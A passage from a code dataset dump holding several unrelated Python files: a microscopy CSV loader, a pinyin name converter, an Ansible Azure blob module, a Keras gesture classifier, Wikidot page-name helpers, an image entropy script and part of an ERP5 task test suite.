relative_positions.py.\n Also extracts unful substrings from the input filename that will be used\n to outpur results files and puts them in the\n info dictionary. These are:\n results_dir (str): All output files are saved in a directory at the same\n level in the directory structure as the input data and with the\n name that consists of the input file and a date stamp.\n in_file_no_path (str): The input file name with no path.\n filename_without_extension (str): Input file name wihtout the path and\n file extension. It is used to create a unique name of the output\n data file and directory.\n\n Args:\n info (dict): A python dictionary containing a collection of useful parameters\n such as the filenames and paths.\n Returns:\n xyz_values (numpy array): A numpy array of the x, y (and z) localisations.\n \"\"\"\n\n in_file = info['in_file_and_path']\n\n if not os.path.exists(in_file):\n sys.exit(\"ERROR; The input file does not exist.\")\n\n if in_file[-4:] == '.csv':\n try:\n line = open(in_file).readline()\n except (EOFError, IOError, OSError) as exception:\n print(\"\\n\\nCould not open file: \", in_file)\n print(\"\\n\\n\", type(exception))\n sys.exit(\"Could not open the input file \"+in_file+\".\\n\")\n if (line.__contains__(\"xx_separation,yy_separation, ,xy_separation\") or\n line.__contains__(\"xx_separation,yy_separation,zz_separation,\"\n \"xy_separation,xz_separation,yz_separation,\"\n \"xyz_separation\")):\n skip = 1\n try:\n xyz_values = np.loadtxt(in_file, delimiter=',', skiprows=skip)\n except (EOFError, IOError, OSError) as exception:\n print(\"\\n\\nCould not read file: \", in_file)\n print(\"\\n\\n\", type(exception))\n sys.exit(\"Could not read the input file \"+in_file+\".\\n\")\n else:\n xyz_values = 'Ouch'\n print('Sorry, wrong format! This program needs a file output from '\n 'relative_positions.py\\n')\n sys.exit(\"The input file \"+in_file+\" has the wrong format. It needs \"\n \"a file output form relative_positions\\n\")\n else:\n xyz_values = 'Ouch'\n print('Sorry, wrong format! This program needs a file output from '\n 'relative_positions.py\\n')\n sys.exit(\"The input file \"+in_file+\" has the wrong format. It needs \"\n \"a file output form relative_positions\\n\")\n\n\n info['values'] = xyz_values.shape[0]\n info['columns'] = xyz_values.shape[1]\n info['total_values'] = xyz_values.shape[0]\n info['total_columns'] = xyz_values.shape[1]\n\n\n return xyz_values\n","repo_name":"AlistairCurd/PERPL-Python3","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":11970,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"3016721354","text":"# -*- coding:utf-8 -*-\n# @Time : 2022/3/20 14:01\n# @Author : Yinkai Yang\n# @FileName: extraction_utils.py\n# @Software: PyCharm\n# @Description: this is a program related to\nimport pandas as pd\nfrom pypinyin import lazy_pinyin\n\n\ndef write_file(teachers):\n \"\"\"写文件,向teacher.txt文件中写入老师的英文名字\n\n :param teachers: 老师的英文名字列表list\n :return: 无\n \"\"\"\n count = 0\n with open(\"teacher.txt\", \"w+\") as f:\n for i in teachers:\n f.write(i)\n count = count + 1\n if count != len(teachers):\n f.write('\\n')\n f.close()\n return\n\n\ndef util_function():\n \"\"\"从teaches_name.xlsx文件中读取老师的中文名字,转换成英文。\n 这边功能有点杂糅,可以把将数据处理定义为一个函数(略过此操作)\n\n :return: 无\n \"\"\"\n teachers_list = []\n ex = pd.read_excel(\"teachers_name.xlsx\")\n for i in ex['姓名']:\n name_list = lazy_pinyin(i)\n\n first_name = name_list[0]\n last_name_list = name_list[1:]\n last_name = \"\"\n for character in last_name_list:\n last_name = last_name + character\n\n en_name = last_name.capitalize() + \"_\" + first_name.capitalize()\n teachers_list.append(en_name)\n write_file(teachers_list)\n return\n\n","repo_name":"Yykai1/detail_information","sub_path":"extraction_utils.py","file_name":"extraction_utils.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"7660231479","text":"#!/usr/bin/python\n\n# (c) Robert Forsström, robert@middleware.se\n\n#TODO: Both present with a src_blob_name and same_as builds the\n# BlobObject this should be put in to an function. Also add a posibillity to just define the container as src.\n\n\n\n#---- From Library File: AzureStorage.py ----\n\n\n\nimport json\n\n\nclass AzureStorage(object):\n def __init__(self, resource_group, name):\n self.resourceGroup = resource_group\n self.storageAccountName = name\n self.connectionString = False\n\n def getConnectionString(self):\n if self.connectionString==False:\n azcs = AzureClient.run([\"azure\", \"storage\", \"account\", \"connectionstring\", \"show\", \"--json\", \"--resource-group\", self.resourceGroup, self.storageAccountName])\n if azcs[\"rc\"] != 0:\n raise AzureProvisionException(azcs[\"err\"])\n cs = json.loads (azcs[\"out\"])\n self.connectionString = cs[\"string\"]\n\n return self.connectionString\n\n\n#---- EOF: AzureStorage.py ---\n\n\n\n#---- From Library File: AzureBlob.py ----\n\n\nimport os\nimport hashlib\nimport base64\n\nclass AzureBlob(AzureStorage):\n def __init__(self, resource_group, account, container, name):\n super(self.__class__, self).__init__(resource_group, account)\n self.container = container\n self.name = name\n\nclass AzureBlobOps():\n\n @staticmethod\n def upload(localPath, blob , type):\n if not os.path.isfile(localPath):\n raise AzureNotFound(\"Local file not found: \"+ localPath)\n azcs = AzureClient.run([\"azure\", \"storage\", \"blob\", \"upload\", \"--connection-string\", blob.getConnectionString(), \"--container\", blob.container, \"--blob\", blob.name,\"--blobtype\", type, \"--json\", \"--quiet\", \"--file\", localPath])\n if azcs[\"rc\"] != 0:\n raise AzureNotFound(\"Upload failed: \"+ azcs[\"err\"])\n\n @staticmethod\n def exists(blob):\n azcs = AzureClient.run([\"azure\", \"storage\", \"blob\", \"show\", \"--connection-string\", blob.getConnectionString(), \"--container\", blob.container, \"--blob\", blob.name, \"--json\"])\n if azcs[\"rc\"] != 0:\n return False\n return True\n\n @staticmethod\n def copy(blob, dest):\n azcs = AzureClient.run([\"azure\", \"storage\", \"blob\", \"copy\", \"start\", \"--connection-string\", blob.getConnectionString(), \"--source-container\", blob.container, \"--source-blob\", blob.name,\"--dest-connection-string\", dest.getConnectionString(), \"--dest-container\", dest.container, \"--dest-blob\", dest.name, \"--quiet\", \"--json\"])\n ## TODO: Wait until filecopy has succeeded.\n\n if azcs[\"rc\"] != 0:\n raise AzureNotFound(\"Copy failed\"+ azcs[\"err\"])\n\n @staticmethod\n def blobIsSameAs(blob1, blob2):\n azcs1 = AzureClient.run([\"azure\", \"storage\", \"blob\", \"show\", \"--connection-string\", blob1.getConnectionString(), \"--container\", blob1.container, \"--blob\", blob1.name, \"--json\"])\n azcs2 = AzureClient.run([\"azure\", \"storage\", \"blob\", \"show\", \"--connection-string\", blob2.getConnectionString(), \"--container\", blob2.container, \"--blob\", blob2.name, \"--json\"])\n\n if azcs1[\"rc\"] != 0 or azcs2[\"rc\"] != 0 :\n raise AzureNotFound(\"Comparison failed \"+ azcs1[\"err\"] + azcs2[\"err\"])\n b1res = json.loads (azcs1[\"out\"])\n b2res = json.loads (azcs2[\"out\"])\n\n if b1res[\"contentMD5\"] == b2res[\"contentMD5\"]:\n return True\n return False\n\n @staticmethod\n def localFileIsSameAs(localPath, blob):\n\n if not os.path.isfile(localPath):\n raise AzureNotFound(\"Local file not found: \"+ localPath)\n\n azcs1 = AzureClient.run([\"azure\", \"storage\", \"blob\", \"show\", \"--connection-string\", blob.getConnectionString(), \"--container\", blob.container, \"--blob\", blob.name, \"--json\"])\n if azcs1[\"rc\"] != 0:\n raise AzureNotFound(\"Comparison failed \"+ azcs1[\"err\"])\n\n b1res = json.loads (azcs1[\"out\"])\n\n fileMD5 = AzureBlobOps._md5(localPath)\n\n if b1res[\"contentMD5\"] == base64.b64encode(fileMD5):\n return True\n return False\n\n\n @staticmethod\n def _md5(fname):\n hash = hashlib.md5()\n with open(fname, \"rb\") as f:\n for chunk in iter(lambda: f.read(4096), b\"\"):\n hash.update(chunk)\n return hash.digest()\n\n @staticmethod\n def delete(blob):\n pass\n\n\n#---- EOF: AzureBlob.py ---\n\n\n\n#---- From Library File: AzureClient.py ----\n\n\n\nfrom subprocess import CalledProcessError, check_output, Popen, PIPE\n\nclass AzureClient ():\n @staticmethod\n def run (args):\n azp = Popen (args, stdout=PIPE, stderr=PIPE)\n output = azp.communicate();\n stdout = output[0]\n stderr = output[1]\n return dict (out=stdout, err=stderr, rc=azp.returncode)\n\n\n#---- EOF: AzureClient.py ---\n\n\n\n#---- From Library File: AzureExceptions.py ----\n\n\nclass AzureNotModifiable (Exception):\n def __init__(self, msg):\n self.msg=msg\n\nclass AzureClientException (Exception):\n def __init__(self, msg):\n self.msg=msg\n\nclass AzureProvisionException(Exception):\n def __init__(self, msg):\n self.msg=msg\n\nclass AzureParamentersNotValid(Exception):\n def __init__(self, msg):\n self.msg=msg\n\nclass AzureNotFound(Exception):\n def __init__(self, msg):\n self.msg=msg\n\n\n#---- EOF: AzureExceptions.py ---\n\n\n\ndef main():\n\n module = AnsibleModule(\n argument_spec = dict(\n state = dict(default='present', choices=['present', 'absent', 'same_as']),\n name = dict(required=True),\n container = dict(required=True),\n resource_group = dict(required=True),\n storage_account = dict(required=True),\n upload_blob_type = dict(default='block', choices=['block', 'page', 'append']),\n src_blob_name = dict(required=False),\n src_storage_account = dict(required=False),\n src_container = dict(required=False),\n src_local_path = dict(required=False),\n overwrite = dict(default=False, choices=BOOLEANS),\n username = dict(required=False),\n password = dict(required=False)\n )\n )\n\n try:\n azb = AzureBlob(module.params[\"resource_group\"], module.params[\"storage_account\"], module.params[\"container\"], module.params[\"name\"])\n azb_src = None\n\n blobExist= AzureBlobOps.exists(azb)\n\n if module.params[\"state\"] == \"present\":\n\n if blobExist:\n module.exit_json(changed=False)\n\n if not blobExist and module.params[\"src_blob_name\"] is not None:\n src_storage_account = module.params[\"storage_account\"] if module.params[\"src_storage_account\"] is None else module.params[\"src_storage_account\"]\n src_container = module.params[\"container\"] if module.params[\"src_container\"] is None else module.params[\"src_container\"]\n\n azb_src = AzureBlob(module.params[\"resource_group\"],src_storage_account, src_container, module.params[\"src_blob_name\"])\n\n if AzureBlobOps.exists(azb_src):\n AzureBlobOps.copy (azb_src, azb)\n module.exit_json(changed=True)\n else:\n module.fail_json(msg=\"Can not find source blob: \"+module.params[\"src_blob_name\"]+ \" in container \"+src_container + \" on account \" +src_storage_account)\n\n if not blobExist and module.params[\"src_local_path\"] is not None:\n AzureBlobOps.upload(module.params[\"src_local_path\"], azb, module.params[\"upload_blob_type\"] )\n module.exit_json(changed=True)\n\n module.fail_json(msg=\"Blob does not exist.\")\n\n\n\n if module.params[\"state\"] == \"absent\":\n if blobExist:\n AzureBlobOps.delete(azb);\n module.exit_json(changed=True)\n\n module.exit_json(changed=False)\n\n if module.params[\"state\"] == \"same_as\":\n if module.params[\"src_blob_name\"] is not None:\n src_storage_account = module.params[\"storage_account\"] if module.params[\"src_storage_account\"] is None else module.params[\"src_storage_account\"]\n src_container = module.params[\"container\"] if module.params[\"src_container\"] is None else module.params[\"src_container\"]\n azb_src = AzureBlob(module.params[\"resource_group\"],src_storage_account, src_container, module.params[\"src_blob_name\"])\n\n if AzureBlobOps.exists(azb_src):\n if AzureBlobOps.blobIsSameAs (azb_src, azb):\n module.exit_json(changed=False)\n else:\n if module.boolean(module.params[\"overwrite\"]):\n AzureBlobOps.copy(azb_src, azb)\n module.exit_json(changed=True)\n else:\n module.fail_json(msg=\"The two blobs are not the same: \"+azb.name +\" != \"+azb_src.name)\n else:\n module.fail_json(msg=\"Can not find source blob: \"+module.params[\"src_blob_name\"]+ \" in container \"+src_container + \" on account \" +src_storage_account)\n\n if module.params[\"src_local_path\"] is not None:\n if AzureBlobOps.localFileIsSameAs (module.params[\"src_local_path\"], azb):\n module.exit_json(changed=False)\n else:\n if module.boolean(module.params[\"overwrite\"]):\n AzureBlobOps.upload(module.params[\"src_local_path\"], azb, module.params[\"upload_blob_type\"])\n module.exit_json(changed=True)\n else:\n module.fail_json(msg=\"The blob and file are not the same: \"+azb.name +\" != \"+module.params[\"src_local_path\"])\n\n except AzureClientException as e:\n module.fail_json(msg=e.msg)\n\n except AzureProvisionException as e:\n module.fail_json(msg=e.msg)\n\n except AzureNotFound as e:\n module.fail_json(msg=e.msg)\n\nfrom ansible.module_utils.basic import *\nif __name__ == '__main__':\n main()\n","repo_name":"mtekkie/ansible-azure","sub_path":"az_blob.py","file_name":"az_blob.py","file_ext":"py","file_size_in_byte":10160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"3226417613","text":"from keras.models import model_from_json\nimport cv2\nimport numpy as np\n\n\ndef preprocess(img):\n img = cv2.resize(img, (64, 64), interpolation=cv2.INTER_NEAREST).astype(np.float32)\n # print(img.shape)\n return img\n\nclass GestureClassifier:\n def __init__(self):\n self.model = None\n\n def load_model(self):\n json_file = open('training/model.json', 'r')\n loaded_model = json_file.read()\n json_file.close()\n self.model = model_from_json(loaded_model)\n self.model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])\n self.model.load_weights('training/hand_detection_weights.h5')\n print(\"completed loading model\")\n\n def predict(self, img):\n # print(img.shape)\n img1 = img.copy()\n img1 = preprocess(img1)\n k = self.model.predict(np.array([img1]))\n score = max(k[0])\n res = list(k[0]).index(score)\n\n return chr(65 + res), score\n","repo_name":"apuayush/hand_gest","sub_path":"predict_gesture.py","file_name":"predict_gesture.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"35166396232","text":"# A package to support API access to Wikidot\n\n# *****************************************************************\n# Return a Wikidot cannonicized version of a name\n# The cannonicized name turns all spans of non-alphanumeric characters into a single hyphen, drops all leading and trailing hyphens\n# and turns all alphabetic characters to lower case\n# A Raw name is a single string possibly including a category: prefix\ncannonicalToReal = {} # A dictionary which lets us go from cannonical names back to real names\n\n\n# We need to convert a string to Wikidot's cannonical form: All lower case; All spans of special characters reduced to a hyphen; No leading ro trailing hyphens.\n# The strategy is to iterate through the name, copying characters to a list of characters which is later merged into the return string. (Appending to a string is too expensive.)\ndef CannonicizeString(name):\n out = []\n inAlpha = False\n inJunk = False\n for c in name:\n if c.isalnum() or c == ':': # \":\", the category separator, is an honorary alphanumeric\n if inJunk:\n out.append(\"-\")\n out.append(c)\n inJunk = False\n inAlpha = True\n else:\n inJunk = True\n inAlpha = False\n # Remove any leading or trailing \"-\"\n canname=''.join(out)\n if canname[0] == \"-\":\n canname=canname[1:]\n if canname[:-1] == \"-\":\n canname=canname[:-1]\n return canname\n\n# Take a raw name (mixed case, special characters, a potential category, etc.) and turn it into a properly formatted cannonicized name:\n# Either \":\" or, when there is no category, just \"\"\n# In both cases, the <> text is cannonicized\ndef Cannonicize(pageNameZip):\n if pageNameZip == None:\n return None\n pageName = pageNameZip.lower()\n\n # Split out the category, if any.\n splitName=pageName.split(\":\")\n if len(splitName) > 2:\n splitName=[splitName[0], \" \".join(splitName[1:])] # Assume first colon is the category divider. The rest will eventually be ignored\n\n # Handle the case of no category\n if len(splitName) == 1:\n canName=CannonicizeString(splitName[0])\n name=splitName[0]\n else:\n canName=CannonicizeString(splitName[0])+\":\"+CannonicizeString(splitName[1])\n name=splitName[0]+\":\"+splitName[1]\n\n # And save the cannocized and raw versions of the name in a reverse-lookup dictionary\n if cannonicalToReal.get(canName) == None:\n cannonicalToReal[canName]=name # Add this cannonical-to-real conversion to the dictionary\n return canName\n\n\n# *****************************************************************\n# Potentially add this entry to the list of uncannonicized page names\ndef AddUncannonicalName(uncanName, canName):\n if cannonicalToReal.get(canName) == None:\n cannonicalToReal[canName]=uncanName\n else:\n if ([x.isupper() for x in uncanName].count(True) > [x.isupper() for x in cannonicalToReal[canName]].count(True)):\n cannonicalToReal[canName]=uncanName\n\n\n# *****************************************************************\ndef Uncannonicize(name):\n n=cannonicalToReal.get(name)\n if n != None:\n return n\n\n # OK, this is most likely the name of a redirect page. The best we can do is to remove internal hyphens.\n # (We need to do better here!)\n return name.replace(\"-\", \"\")\n\n\n# *****************************************************************\n# Is the page a redirect? If yes, return the cannonicized redirect; if not, return null\n# A redirect is of the form [[module Redirect destination=\"\"]]\n# We want to return the cannonicized destination or None if it is not a redirect\ndef IsRedirect(pageText):\n pageText = pageText.strip() # Remove leading and trailing whitespace\n if pageText.lower().startswith('[[module redirect destination=\"') and pageText.endswith('\"]]'):\n return Cannonicize(pageText[31:].rstrip('\"]'))\n return None\n\n\n# *****************************************************************\n# Should this filename be ignored?\n# Return value is either the cleaned filename or None if the file should be ignored.\ndef InterestingFilenameZip(filenameZip):\n\n if not filenameZip.startswith(\"source/\"): # We're only interested in source files\n return None\n if len(filenameZip) <= 11: # There needs to be something there besides 'source/.txt'\n return None\n\n # These files are specific to Fancyclopedia and are known to be ignorable\n if filenameZip.startswith(\"source/index_people\"): # Pages with names \"source/index_people...\" are index pages, not content pages.\n return None\n if filenameZip.startswith(\"source/index_alphanumeric\"): # Likewise\n return None\n if filenameZip.startswith(\"source/testing_alphanumeric\"): # Likewise\n return None\n\n return filenameZip[7:-4] # Drop \"source/\" and \".txt\", returning the cleaned name\n\n\n# *****************************************************************\n# Read a source file from a zipped Wikidot backup\ndef ReadPageSourceFromZip(zip, filename):\n\n if InterestingFilenameZip(filename) == None:\n return None\n\n source = zip.read(filename).decode(\"utf-8\")\n if source == None:\n print(\"error: '\" + filename + \"' read as None\")\n exit\n return source\n\n# *****************************************************************\n# Convert the filename in a zipped Wikidot backup (which uses \"_\" to indicate a category) to use a Wikidot \":\" category indicator\n# Change : to _\ndef ConvertZipCategoryMarker(name):\n return name.replace(\":\", \"_\", 1)","repo_name":"bodekerscientific/wikidot_tools","sub_path":"WikidotHelpers.py","file_name":"WikidotHelpers.py","file_ext":"py","file_size_in_byte":5657,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"5824295870","text":"import cv2\nimport numpy as np\n\n# image loaded\nbgr_img1 = cv2.imread('../lena.png')\nbgr_img2 = cv2.imread('../northcap.png')\n\n# switch bgr --> grb\nrgb_img1 = cv2.cvtColor(bgr_img1, cv2.COLOR_BGR2RGB)\nrgb_img2 = cv2.cvtColor(bgr_img2, cv2.COLOR_BGR2RGB)\n\n# calculate number of pixels\npixels_img1 = rgb_img1.shape[0]*rgb_img1.shape[1]\npixels_img2 = rgb_img2.shape[0]*rgb_img2.shape[1]\n\n# calculate histogram for each color\ncolors = ('R', 'G', 'B')\n# variables for holding the R, G, B entropy values for each image\nentropy_img1 = [0, 0, 0]\nentropy_img2 = [0, 0, 0]\n\n# for each color\nfor i, color in enumerate(colors):\n # calculate the histogram for each of the i channels\n hist_img1 = cv2.calcHist([rgb_img1], [i], None, [256], [0, 256])\n hist_img2 = cv2.calcHist([rgb_img2], [i], None, [256], [0, 256])\n\n # calculate entropy for R\n for value in hist_img1:\n # to avoid undefined log behaviour\n if value != 0:\n added_entropy = (value/pixels_img1) * (np.log2(value/pixels_img1))\n entropy_img1[i] += added_entropy\n entropy_img1[i] *= (-1)\n\n for value in hist_img2:\n # to avoid undefined log behaviour\n if value != 0:\n added_entropy = (value/pixels_img2) * (np.log2(value/pixels_img2))\n entropy_img2[i] += added_entropy\n entropy_img2[i] *= (-1)\n\nprint(entropy_img1)\nprint(entropy_img2)\n","repo_name":"sivansha/image-processing","sub_path":"image-processing/code/q2_d.py","file_name":"q2_d.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71243916083","text":"import unittest\n\nfrom Products.ERP5Type.tests.ERP5TypeTestCase import ERP5TypeTestCase\nfrom AccessControl.SecurityManagement import newSecurityManager\nfrom DateTime import DateTime\nfrom Products.ERP5Type.Core.Workflow import ValidationFailed\nfrom Products.ERP5Type.tests.Sequence import SequenceList, Sequence\n\nclass TestTaskMixin:\n\n default_quantity = 99.99999999\n default_price = 555.88888888\n person_portal_type = 'Person'\n organisation_portal_type = 'Organisation'\n resource_portal_type = 'Service'\n project_portal_type = 'Project'\n requirement_portal_type = 'Requirement'\n requirement_document_portal_type = 'Requirement Document'\n task_portal_type = 'Task'\n task_description = 'Task Description %s'\n task_line_portal_type = 'Task Line'\n task_report_portal_type = 'Task Report'\n task_report_line_portal_type = 'Task Report Line'\n datetime = DateTime()\n task_workflow_id='task_workflow'\n business_process = 'business_process_module/erp5_default_business_process'\n\n default_task_sequence = '\\\n stepLogin \\\n stepCreateOrganisation \\\n stepCreateOrganisation \\\n stepCreateResource \\\n stepCreateProject \\\n stepCreateRequirement \\\n stepCreateSimpleTask \\\n stepCreateCurrency \\\n stepFillTaskWithData \\\n stepSetTaskPriceCurrency \\\n stepConfirmTask \\\n stepTic \\\n stepSetTaskReport '\n\n default_task_no_price_sequence = '\\\n stepLogin \\\n stepCreateOrganisation \\\n stepCreateOrganisation \\\n stepCreateResource \\\n stepCreateProject \\\n stepCreateRequirement \\\n stepCreateSimpleTask \\\n stepFillTaskWithData \\\n stepConfirmTask \\\n stepTic \\\n stepSetTaskReport '\n\n\n default_task_sequence_two_lines = '\\\n stepLogin \\\n stepCreateOrganisation \\\n stepCreateOrganisation \\\n stepCreateResource \\\n stepCreateResource \\\n stepCreateProject \\\n stepCreateSimpleTask \\\n stepCreateCurrency \\\n stepFillTaskWithData \\\n stepSetTaskPriceCurrency \\\n stepCreateTaskLine \\\n stepFillTaskLineWithData \\\n stepConfirmTask \\\n stepTic \\\n stepSetTaskReport '\n\n default_task_report_sequence = '\\\n stepLogin \\\n stepCreateOrganisation \\\n stepCreateOrganisation \\\n stepCreateResource \\\n stepCreateProject \\\n stepCreateSimpleTaskReport \\\n stepCreateCurrency \\\n stepFillTaskReportWithData \\\n stepSetTaskReportPriceCurrency \\\n stepCreateTaskReportLine '\n\n def getBusinessTemplateList(self):\n \"\"\"\n \"\"\"\n return ('erp5_base','erp5_pdm', 'erp5_simulation', 'erp5_trade',\n 'erp5_project', 'erp5_simulation_test',\n 'erp5_configurator_standard_solver',\n 'erp5_simulation_test_trade_template',\n 'erp5_core_proxy_field_legacy')\n\n# def stepLogin(self, **kw):\n# portal = self.getPortal()\n# uf = portal.acl_users\n# if not uf.getUserById('dummy'):\n# import transaction\n# uf._doAddUser('manager', '', ['Manager'], [])\n# self.loginByUserName('manager')\n# person_module = portal.getDefaultModule(self.person_portal_type)\n# person = person_module.newContent(id='dummy', title='dummy',\n# reference='dummy')\n# portal.portal_categories.group.newContent(id='dummy',\n# codification='DUMMY')\n#\n# assignment = person.newContent(title='dummy', group='dummy',\n# portal_type='Assignment',\n# start_date='1980-01-01',\n# stop_date='2099-12-31')\n# assignment.open()\n# transaction.commit()\n# self.tic()\n# module_list = []\n# portal_type_list = []\n# for portal_type in (self.resource_portal_type,\n# self.project_portal_type,\n# self.requirement_document_portal_type,\n# self.organisation_portal_type,\n# self.task_portal_type,\n# self.task_report_portal_type,\n# self.category_portal_type,):\n# module = portal.getDefaultModule(portal_type)\n# module_list.append(module)\n# portal_type_list.append(portal_type)\n# portal_type_list.append(module.getPortalType())\n#\n# for portal_type in portal_type_list:\n# ti = portal.portal_types[portal_type]\n# ti.addRole('Auditor;Author;Assignee;Assignor', '', 'Dummy',\n# '', 'group/dummy', 'ERP5Type_getSecurityCategoryFromAssignment',\n# '')\n# ti.updateRoleMapping()\n#\n# transaction.commit()\n# self.tic()\n# portal.portal_caches.clearAllCache()\n#\n# self.loginByUserName('dummy')\n def stepLogin(self, quiet=0, run=1, **kw):\n uf = self.getPortal().acl_users\n uf._doAddUser('alex', '', ['Manager', 'Assignee', 'Assignor',\n 'Associate', 'Auditor', 'Author'], [])\n user = uf.getUserById('alex').__of__(uf)\n newSecurityManager(None, user)\n\n def stepCreateResource(self,sequence=None, sequence_list=None, \\\n **kw):\n \"\"\"\n Create a resource_list with no variation\n \"\"\"\n resource_list = sequence.get('resource_list', [])\n portal = self.getPortal()\n resource_module = portal.getDefaultModule(self.resource_portal_type)\n resource = resource_module.newContent(\n portal_type=self.resource_portal_type,\n title = 'Resource%s' % len(resource_list),\n )\n resource_list.append(resource)\n sequence.edit(resource_list=resource_list)\n\n def stepCreateProject(self,sequence=None, sequence_list=None, \\\n **kw):\n \"\"\"\n Create a project\n \"\"\"\n portal = self.getPortal()\n module = portal.getDefaultModule(self.project_portal_type)\n obj = module.newContent(\n portal_type=self.project_portal_type,\n title = 'Project',\n )\n sequence.edit(project=obj)\n\n def stepCreateRequirement(self,sequence=None, sequence_list=None, \\\n **kw):\n \"\"\"\n Create a requirement\n \"\"\"\n portal = self.getPortal()\n module = portal.getDefaultModule(self.requirement_document_portal_type)\n obj = module.newContent(\n portal_type=self.requirement_document_portal_type,\n title = 'Requirement Document',\n )\n subobj = obj.newContent(\n portal_type=self.requirement_portal_type,\n title = 'Requirement',\n )\n sequence.edit(requirement=subobj)\n\n def stepCreateOrganisation(self, sequence=None, sequence_list=None, **kw):\n \"\"\"\n Create a empty organisation\n \"\"\"\n organisation_list = sequence.get('organisation_list', [])\n portal = self.getPortal()\n organisation_module = portal.getDefaultModule(\n portal_type=self.organisation_portal_type)\n organisation = organisation_module.newContent(\n portal_type=self.organisation_portal_type,\n title='Organization%s' % len(organisation_list),\n )\n organisation_list.append(organisation)\n sequence.edit(organisation_list=organisation_list)\n\n def stepCreateSimpleTask(self,sequence=None, sequence_list=None, **kw):\n \"\"\"\n Create a task and fill it with dummy data.\n \"\"\"\n task_module = self.portal.getDefaultModule(\n portal_type=self.task_portal_type)\n task = task_module.newContent(\n portal_type=self.task_portal_type,\n title=str(self),\n description=\"This is a very simple task. You can do it quickly.\",\n specialise=self.business_process)\n # Check if no task lines are created at the start\n self.assertEqual(len(task.contentValues()), 0)\n sequence.edit(task=task)\n\n def stepCreateCurrency(self, sequence, **kw) :\n \"\"\"Create a default currency. \"\"\"\n currency_module = self.getCurrencyModule()\n if len(currency_module.objectValues(id='EUR'))==0:\n currency = self.getCurrencyModule().newContent(\n portal_type='Currency',\n id=\"EUR\",\n base_unit_quantity=0.01,\n )\n else:\n currency = currency_module.objectValues(id='EUR')[0]\n sequence.edit(currency=currency)\n\n def stepSetTaskPriceCurrency(self, sequence, **kw) :\n \"\"\"Set the price currency of the task.\n\n TODO : include a test with this step late.\n \"\"\"\n currency = sequence.get('currency')\n task = sequence.get('task')\n task.setPriceCurrency(currency.getRelativeUrl())\n\n def stepSetTaskValues(self, sequence=None, sequence_list=None, **kw):\n \"\"\"\n Fill created task with some necessary data.\n \"\"\"\n task = sequence.get('task')\n project = sequence.get('project')\n organisation_list = sequence.get('organisation_list')\n organisation1 = organisation_list[0]\n organisation2 = organisation_list[1]\n task.edit(source_value=organisation1,\n source_section_value=organisation1,\n destination_value=organisation2,\n destination_section_value=organisation2,\n source_project_value=project,\n destination_project_value=project,\n description=self.task_description % task.getId(),\n start_date = self.datetime + 10,\n stop_date = self.datetime + 20,)\n sequence.edit( task = task)\n\n def stepFillTaskWithData(self, sequence=None, sequence_list=None, **kw):\n \"\"\"\n Fill created task with some necessary data.\n \"\"\"\n self.stepSetTaskValues(sequence=sequence,\n sequence_list=sequence_list, **kw)\n task = sequence.get('task')\n resource = sequence.get('resource_list')[0]\n requirement = sequence.get('requirement')\n task.edit(task_line_resource_value = resource,\n task_line_quantity = self.default_quantity,\n task_line_price = self.default_price,\n task_line_requirement_value = requirement,\n task_line_description = 'Default Task Line Description',\n )\n\n def stepCreateSimpleTaskReport(self,sequence=None, sequence_list=None, **kw):\n \"\"\"\n Create a task report.\n \"\"\"\n task_report_module = self.portal.getDefaultModule(\n portal_type=self.task_report_portal_type)\n task_report = task_report_module.newContent(\n portal_type=self.task_report_portal_type,\n title=str(self),\n specialise=self.business_process)\n # Check if no task lines are created at the start\n self.assertEqual(len(task_report.contentValues()), 0)\n sequence.edit(task_report = task_report)\n\n def stepFillTaskReportWithData(self, sequence=None, sequence_list=None, **kw):\n \"\"\"\n Fill created task report with some necessary data.\n \"\"\"\n task_report = sequence.get('task_report')\n organisation_list = sequence.get('organisation_list')\n organisation1 = organisation_list[0]\n organisation2 = organisation_list[1]\n project = sequence.get('project')\n task_report.edit(source_value=organisation1,\n source_section_value=organisation1,\n destination_value=organisation1,\n destination_section_value=organisation2,\n source_project_value=project,\n destination_project_value=project,\n start_date = self.datetime + 10,\n stop_date = self.datetime + 20,)\n sequence.edit( task_report = task_report)\n\n def stepSetTaskReportPriceCurrency(self, sequence, **kw) :\n \"\"\"Set the price currency of the task.\n\n This step is not necessary.\n TODO : - include a test without this step.\n - include a test with this step late.\n \"\"\"\n currency = sequence.get('currency')\n task_report = sequence.get('task_report')\n task_report.setPriceCurrency(currency.getRelativeUrl())\n\n def stepCreateTaskReportLine(self, sequence=None, sequence_list=None, **kw):\n \"\"\"\n Create task report line and fill with dummy data.\n \"\"\"\n resource = sequence.get('resource_list')[0]\n task_report = sequence.get('task_report')\n task_report_line = task_report.newContent(\n portal_type=self.task_report_line_portal_type)\n task_report_line.edit( title = 'New Task Report Line',\n resource_value = resource,\n quantity = self.default_quantity,\n price = self.default_price)\n sequence.edit(task_report_line = task_report_line)\n\n def stepVerifyGeneratedByBuilderTaskReport(self, sequence=None,\n sequence_list=None, **kw):\n \"\"\"\n Verify that simulation generated report is correct.\n \"\"\"\n task = sequence.get('task')\n task_report = sequence.get('task_report')\n self.assertEqual('confirmed', task_report.getSimulationState())\n self.assertEqual(task.getSource(), task_report.getSource())\n self.assertEqual(task.getSourceSection(), task_report.getSourceSection())\n self.assertEqual(task.getSourceProject(), task_report.getSourceProject())\n self.assertEqual(task.getDestination(), task_report.getDestination())\n self.assertEqual(task.getDestinationSection(),\n task_report.getDestinationSection())\n self.assertEqual(task.getDestinationDecision(),\n task_report.getDestinationDecision())\n self.assertEqual(task.getTitle(),\n task_report.getTitle())\n self.assertEqual(task.getDescription(),\n task_report.getDescription())\n self.assertEqual(task.getPredecessor(), task_report.getPredecessor())\n self.assertEqual(task.getDescription(), 